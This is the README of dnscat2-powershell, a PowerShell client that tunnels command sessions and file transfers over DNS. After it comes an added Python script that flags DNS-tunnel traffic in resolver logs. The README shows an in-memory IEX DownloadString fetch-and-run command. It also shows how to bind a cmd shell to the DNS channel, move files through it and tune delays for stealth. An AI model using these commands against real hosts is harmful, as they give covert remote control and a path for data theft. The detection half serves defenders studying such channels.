[dnscat2](https://github.com/iagox86/dnscat2) is a DNS covert channel tool by [@iagox86 (Ron Bowes)](https://blog.skullsecurity.org/) which is used to transfer data over DNS requests.

This is a PowerShell version of the dnscat2 C client.

[Click here for a blog post](http://www.blackhillsinfosec.com/?p=5578) that gives a more detailed breakdown of the purpose of this script, and how to use it.

To use this script, you'll need the Ruby [dnscat2 server](https://github.com/iagox86/dnscat2). **Make sure to add the `--no-cache` option when running the server. This client is incompatible with the server's caching.**

### Setup

[First, install the dnscat2 server.](https://github.com/iagox86/dnscat2/blob/master/README.md) Start the server with caching disabled using `--no-cache`. The command to start your server should look something like this: `ruby dnscat2.rb --dns="domain=example.com" --no-cache`

Next, launch Windows PowerShell (version 2.0 or later). You can use this command to load the dnscat2 PowerShell functions:

    IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')

### Examples

`Start-Dnscat2` is the actual function used as the client. Specify the domain the dnscat2 server is listening on using `-Domain` (written as the placeholder `<domain>` below).

Start a command session, and send DNS requests to 8.8.8.8 on port 53:

    Start-Dnscat2 -Domain <domain> -DNSServer 8.8.8.8

Send a cmd shell, and send DNS requests to the default DNS server set in Windows:

    Start-Dnscat2 -Domain <domain> -Exec cmd

Start a console session. Only use CNAME, MX, and AAAA requests:

    Start-Dnscat2 -Domain <domain> -LookupTypes @("CNAME","MX","AAAA") -Console

Do not encrypt the session. Encryption is enabled by default:

    Start-Dnscat2 -Domain <domain> -NoEncryption

### PowerShell Command Session Commands

The client can handle normal dnscat2 commands, or the *PowerShell version* of that command. To use the PowerShell version of a command, set specific parameters the client will detect (these are commands run from a command session on the server):

Start a new session which simulates a PowerShell shell, like ExecPS:

    exec psh

Upload app.exe on the server into a hex string stored in the `$app` PowerShell variable:

    upload app.exe hex:$app

Download the byte array stored in the `$app` PowerShell variable to app.exe on the server:

    download bytes:$app app.exe

### Start-Dnscat2

    -Domain           The domain being used by the dnscat2 server.
    -DNSServer        The hostname or IP address to send DNS queries to. (Default: Set by Windows)
    -DNSPort          The port to send DNS queries to. (Default: 53)

    -Command          Start a command session. (Default)
    -Exec             Link the I/O of a process with the dnscat2 session.
    -Console          Link the I/O of the console with the dnscat2 session.
    -ExecPS           Simulate a PowerShell session and link its I/O with the dnscat2 session.
                      WARNING: Exiting will kill the entire dnscat2 client, not just the session.

    -PreSharedSecret  Set the same secret on the server to authenticate and prevent MITM.
    -NoEncryption     Do not use encryption.

    -LookupTypes      Set an array of lookup types to randomly switch between.
                      Only TXT, MX, CNAME, A, and AAAA records are supported. (Default: @(TXT, MX, CNAME))
    -Delay            Set a delay between each request, in milliseconds. (Default: 0)
    -MaxRandomDelay   Set the max value of a random delay added to the normal delay, in milliseconds. (Default: 0)
    -MaxPacketSize    Maximum length of a dnscat2 packet. (Default: 240)
    -Name             The name of your dnscat2 session. (Default: hostname)

### ExecPS and 'exec psh'

dnscat2-powershell simulates a PowerShell session by passing data from the server to `Invoke-Expression`. Only stdout is returned, and variables are preserved as long as the client is running. **Watch out** for things that exit PowerShell like `exit` and `break`, because the entire dnscat2-powershell client will exit, not just the ExecPS session.

### Other Credits

* [db9 on stackoverflow's](https://stackoverflow.com/users/6866918/db9) [demonstration of BouncyCastle ECDH.](http://stackoverflow.com/a/39662164)
* [FrankSpierings's](https://github.com/FrankSpierings) implementation of [Salsa20](https://gist.github.com/FrankSpierings/c18da658e06948313fff) and [Sha3](https://gist.github.com/FrankSpierings/3577b0365d02df6f7eeb) in PowerShell via C#.
* [Rebex Labs stripped down version of the BouncyCastle DLL for ECC.](http://labs.rebex.net/curves)
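The `Start-Dnscat2` parameter list above describes what the channel looks like on the wire from a defender's side: each dnscat2 packet of up to `MaxPacketSize` (240 bytes by default) is carried in the query name of a TXT, MX, CNAME, A or AAAA lookup under the server's domain, every query name is different, and `-Delay`/`-MaxRandomDelay` mean the request rate can be tuned down. The following Python script is an added example for this README, not code from the dnscat2-powershell project or from dnscat2, and the log format it parses (`<unix_ts> <client_ip> <qtype> <qname>`) and the sample lines are constructed for the example. It profiles queries per registered domain and flags the combination of near-unique query names, long high-entropy subdomains and a high share of the record types the client rotates through, rather than relying on query rate, which the delay options defeat. The thresholds are assumptions chosen for the sample data, not tuned values.

```python
import math
import re
from collections import Counter, defaultdict

# Assumed log line format, constructed for this example (not any real resolver's
# format): "<unix_ts> <client_ip> <qtype> <qname>".
LOG_LINE = re.compile(
    r"^(?P<ts>\d+)\s+(?P<client>\S+)\s+(?P<qtype>[A-Z]+)\s+(?P<qname>\S+)$"
)

# Record types the README lists as the client's default rotation (TXT, MX, CNAME).
# A and AAAA can be selected via -LookupTypes, so this share is one signal among several.
TUNNEL_TYPES = {"TXT", "MX", "CNAME"}
HEX = "0123456789abcdef"


def parse_line(line):
    """Return a dict for a well-formed line, or None so malformed lines are skipped."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["qname"] = rec["qname"].rstrip(".").lower()
    return rec


def registered_domain(qname):
    """Assumption: the registered domain is the last two labels (no public-suffix list)."""
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def shannon_entropy(text):
    """Bits per character; hex-encoded payload approaches 4.0, hostnames sit well below."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def profile_domains(lines):
    """Aggregate per registered domain: volume, distinct names, subdomain length, type mix."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "sub_len": 0,
                                 "sub_chars": [], "types": Counter()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        dom = registered_domain(rec["qname"])
        sub = rec["qname"][:-len(dom)].rstrip(".")   # everything left of the domain
        s = stats[dom]
        s["queries"] += 1
        s["names"].add(rec["qname"])
        s["sub_len"] += len(sub)
        s["sub_chars"].append(sub.replace(".", ""))
        s["types"][rec["qtype"]] += 1
    return stats


def score_domain(dom, s, min_queries=5):
    """Combine the signals; thresholds are assumed values for this sample, not tuned ones."""
    q = s["queries"]
    unique_ratio = len(s["names"]) / q
    avg_sub_len = s["sub_len"] / q
    entropy = shannon_entropy("".join(s["sub_chars"]))
    tunnel_frac = sum(s["types"][t] for t in TUNNEL_TYPES) / q
    suspicious = (q >= min_queries and unique_ratio >= 0.9 and avg_sub_len >= 30
                  and entropy >= 3.0 and tunnel_frac >= 0.5)
    return {"domain": dom, "queries": q, "unique_ratio": unique_ratio,
            "avg_sub_len": avg_sub_len, "entropy": entropy,
            "tunnel_frac": tunnel_frac, "suspicious": suspicious}


def find_suspicious(lines, min_queries=5):
    """Sorted list of registered domains whose query pattern matches the tunnel profile."""
    reports = [score_domain(d, s, min_queries) for d, s in profile_domains(lines).items()]
    return sorted(r["domain"] for r in reports if r["suspicious"])


def build_sample_log():
    """Constructed sample: ordinary lookups, a low-volume TXT domain, a malformed line,
    and a tunnel-like domain whose every query carries two 32-character hex labels."""
    lines = [
        "1700000000 10.0.0.5 A www.example.org",
        "1700000001 10.0.0.5 AAAA www.example.org",
        "1700000002 10.0.0.5 A cdn.example.org",
        "1700000003 10.0.0.5 MX mail.example.org",
        "1700000004 10.0.0.6 A www.example.org",
        "1700000005 10.0.0.6 TXT api.example.org",
        "1700000006 10.0.0.6 TXT updates.vendor.example",
        "1700000007 10.0.0.6 TXT updates.vendor.example",
        "this line is malformed and is skipped",
    ]

    def rotate(k):   # rotated hex alphabet, repeated: 32 chars, every hex digit twice
        return (HEX[k:] + HEX[:k]) * 2

    for i, qtype in enumerate(["TXT", "MX", "CNAME"] * 2):
        qname = f"{rotate(i)}.{rotate(i + 6)}.c2tunnel.test"
        lines.append(f"{1700000010 + i} 10.0.0.7 {qtype} {qname}")
    return lines


if __name__ == "__main__":
    for dom, s in profile_domains(build_sample_log()).items():
        print(score_domain(dom, s))
    print("flagged:", find_suspicious(build_sample_log()))
```

On the constructed sample only `c2tunnel.test` is flagged: its query names are all distinct, the subdomain part averages 65 characters of uniformly distributed hex (entropy 4.0 bits per character), and every query is TXT, MX or CNAME. `example.org` fails on length and uniqueness, and `vendor.example` never reaches the volume gate. In production the registered-domain step should use a public-suffix list, and the thresholds need baselining against the organisation's own resolver logs.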